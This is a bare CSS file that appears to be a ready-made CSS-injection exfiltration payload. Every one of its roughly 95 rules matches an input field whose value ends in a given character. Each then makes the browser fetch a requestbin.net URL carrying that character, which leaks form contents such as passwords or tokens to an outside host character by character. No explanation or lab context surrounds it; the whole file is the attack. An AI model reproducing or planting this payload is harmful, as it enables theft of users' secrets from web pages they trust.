input[value$=" "] { background-image: url("http://requestbin.net/r/1khifea1?x=+"); }
input[value$="!"] { background-image: url("http://requestbin.net/r/1khifea1?x=%21"); }
input[value$="\""] { background-image: url("http://requestbin.net/r/1khifea1?x=%22"); }
input[value$="#"] { background-image: url("http://requestbin.net/r/1khifea1?x=%23"); }
input[value$="$"] { background-image: url("http://requestbin.net/r/1khifea1?x=%24"); }
input[value$="%"] { background-image: url("http://requestbin.net/r/1khifea1?x=%25"); }
input[value$="&"] { background-image: url("http://requestbin.net/r/1khifea1?x=%26"); }
input[value$="'"] { background-image: url("http://requestbin.net/r/1khifea1?x=%27"); }
input[value$="("] { background-image: url("http://requestbin.net/r/1khifea1?x=%28"); }
input[value$=")"] { background-image: url("http://requestbin.net/r/1khifea1?x=%29"); }
input[value$="*"] { background-image: url("http://requestbin.net/r/1khifea1?x=%2A"); }
input[value$="+"] { background-image: url("http://requestbin.net/r/1khifea1?x=%2B"); }
input[value$=","] { background-image: url("http://requestbin.net/r/1khifea1?x=%2C"); }
input[value$="-"] { background-image: url("http://requestbin.net/r/1khifea1?x=-"); }
input[value$="."] { background-image: url("http://requestbin.net/r/1khifea1?x=."); }
input[value$="/"] { background-image: url("http://requestbin.net/r/1khifea1?x=%2F"); }
input[value$="0"] { background-image: url("http://requestbin.net/r/1khifea1?x=0"); }
input[value$="1"] { background-image: url("http://requestbin.net/r/1khifea1?x=1"); }
input[value$="2"] { background-image: url("http://requestbin.net/r/1khifea1?x=2"); }
input[value$="3"] { background-image: url("http://requestbin.net/r/1khifea1?x=3"); }
input[value$="4"] { background-image: url("http://requestbin.net/r/1khifea1?x=4"); }
input[value$="5"] { background-image: url("http://requestbin.net/r/1khifea1?x=5"); }
input[value$="6"] { background-image: url("http://requestbin.net/r/1khifea1?x=6"); }
input[value$="7"] { background-image: url("http://requestbin.net/r/1khifea1?x=7"); }
input[value$="8"] { background-image: url("http://requestbin.net/r/1khifea1?x=8"); }
input[value$="9"] { background-image: url("http://requestbin.net/r/1khifea1?x=9"); }
input[value$=":"] { background-image: url("http://requestbin.net/r/1khifea1?x=%3A"); }
input[value$=";"] { background-image: url("http://requestbin.net/r/1khifea1?x=%3B"); }
input[value$="<"] { background-image: url("http://requestbin.net/r/1khifea1?x=%3C"); }
input[value$="="] { background-image: url("http://requestbin.net/r/1khifea1?x=%3D"); }
input[value$=">"] { background-image: url("http://requestbin.net/r/1khifea1?x=%3E"); }
input[value$="?"] { background-image: url("http://requestbin.net/r/1khifea1?x=%3F"); }
input[value$="@"] { background-image: url("http://requestbin.net/r/1khifea1?x=%40"); }
input[value$="A"] { background-image: url("http://requestbin.net/r/1khifea1?x=A"); }
input[value$="B"] { background-image: url("http://requestbin.net/r/1khifea1?x=B"); }
input[value$="C"] { background-image: url("http://requestbin.net/r/1khifea1?x=C"); }
input[value$="D"] { background-image: url("http://requestbin.net/r/1khifea1?x=D"); }
input[value$="E"] { background-image: url("http://requestbin.net/r/1khifea1?x=E"); }
input[value$="F"] { background-image: url("http://requestbin.net/r/1khifea1?x=F"); }
input[value$="G"] { background-image: url("http://requestbin.net/r/1khifea1?x=G"); }
input[value$="H"] { background-image: url("http://requestbin.net/r/1khifea1?x=H"); }
input[value$="I"] { background-image: url("http://requestbin.net/r/1khifea1?x=I"); }
input[value$="J"] { background-image: url("http://requestbin.net/r/1khifea1?x=J"); }
input[value$="K"] { background-image: url("http://requestbin.net/r/1khifea1?x=K"); }
input[value$="L"] { background-image: url("http://requestbin.net/r/1khifea1?x=L"); }
input[value$="M"] { background-image: url("http://requestbin.net/r/1khifea1?x=M"); }
input[value$="N"] { background-image: url("http://requestbin.net/r/1khifea1?x=N"); }
input[value$="O"] { background-image: url("http://requestbin.net/r/1khifea1?x=O"); }
input[value$="P"] { background-image: url("http://requestbin.net/r/1khifea1?x=P"); }
input[value$="Q"] { background-image: url("http://requestbin.net/r/1khifea1?x=Q"); }
input[value$="R"] { background-image: url("http://requestbin.net/r/1khifea1?x=R"); }
input[value$="S"] { background-image: url("http://requestbin.net/r/1khifea1?x=S"); }
input[value$="T"] { background-image: url("http://requestbin.net/r/1khifea1?x=T"); }
input[value$="U"] { background-image: url("http://requestbin.net/r/1khifea1?x=U"); }
input[value$="V"] { background-image: url("http://requestbin.net/r/1khifea1?x=V"); }
input[value$="W"] { background-image: url("http://requestbin.net/r/1khifea1?x=W"); }
input[value$="X"] { background-image: url("http://requestbin.net/r/1khifea1?x=X"); }
input[value$="Y"] { background-image: url("http://requestbin.net/r/1khifea1?x=Y"); }
input[value$="Z"] { background-image: url("http://requestbin.net/r/1khifea1?x=Z"); }
input[value$="["] { background-image: url("http://requestbin.net/r/1khifea1?x=%5B"); }
input[value$="\\"] { background-image: url("http://requestbin.net/r/1khifea1?x=%5C"); }
input[value$="]"] { background-image: url("http://requestbin.net/r/1khifea1?x=%5D"); }
input[value$="^"] { background-image: url("http://requestbin.net/r/1khifea1?x=%5E"); }
input[value$="_"] { background-image: url("http://requestbin.net/r/1khifea1?x=_"); }
input[value$="`"] { background-image: url("http://requestbin.net/r/1khifea1?x=%60"); }
input[value$="a"] { background-image: url("http://requestbin.net/r/1khifea1?x=a"); }
input[value$="b"] { background-image: url("http://requestbin.net/r/1khifea1?x=b"); }
input[value$="c"] { background-image: url("http://requestbin.net/r/1khifea1?x=c"); }
input[value$="d"] { background-image: url("http://requestbin.net/r/1khifea1?x=d"); }
input[value$="e"] { background-image: url("http://requestbin.net/r/1khifea1?x=e"); }
input[value$="f"] { background-image: url("http://requestbin.net/r/1khifea1?x=f"); }
input[value$="g"] { background-image: url("http://requestbin.net/r/1khifea1?x=g"); }
input[value$="h"] { background-image: url("http://requestbin.net/r/1khifea1?x=h"); }
input[value$="i"] { background-image: url("http://requestbin.net/r/1khifea1?x=i"); }
input[value$="j"] { background-image: url("http://requestbin.net/r/1khifea1?x=j"); }
input[value$="k"] { background-image: url("http://requestbin.net/r/1khifea1?x=k"); }
input[value$="l"] { background-image: url("http://requestbin.net/r/1khifea1?x=l"); }
input[value$="m"] { background-image: url("http://requestbin.net/r/1khifea1?x=m"); }
input[value$="n"] { background-image: url("http://requestbin.net/r/1khifea1?x=n"); }
input[value$="o"] { background-image: url("http://requestbin.net/r/1khifea1?x=o"); }
input[value$="p"] { background-image: url("http://requestbin.net/r/1khifea1?x=p"); }
input[value$="q"] { background-image: url("http://requestbin.net/r/1khifea1?x=q"); }
input[value$="r"] { background-image: url("http://requestbin.net/r/1khifea1?x=r"); }
input[value$="s"] { background-image: url("http://requestbin.net/r/1khifea1?x=s"); }
input[value$="t"] { background-image: url("http://requestbin.net/r/1khifea1?x=t"); }
input[value$="u"] { background-image: url("http://requestbin.net/r/1khifea1?x=u"); }
input[value$="v"] { background-image: url("http://requestbin.net/r/1khifea1?x=v"); }
input[value$="w"] { background-image: url("http://requestbin.net/r/1khifea1?x=w"); }
input[value$="x"] { background-image: url("http://requestbin.net/r/1khifea1?x=x"); }
input[value$="y"] { background-image: url("http://requestbin.net/r/1khifea1?x=y"); }
input[value$="z"] { background-image: url("http://requestbin.net/r/1khifea1?x=z"); }
input[value$="{"] { background-image: url("http://requestbin.net/r/1khifea1?x=%7B"); }
input[value$="|"] { background-image: url("http://requestbin.net/r/1khifea1?x=%7C"); }
input[value$="\\}"] { background-image: url("http://requestbin.net/r/1khifea1?x=%7D"); }
input[value$="~"] { background-image: url("http://requestbin.net/r/1khifea1?x=~"); }
input[value$=""] { background-image: url("http://requestbin.net/r/1khifea1?x=%7F"); }
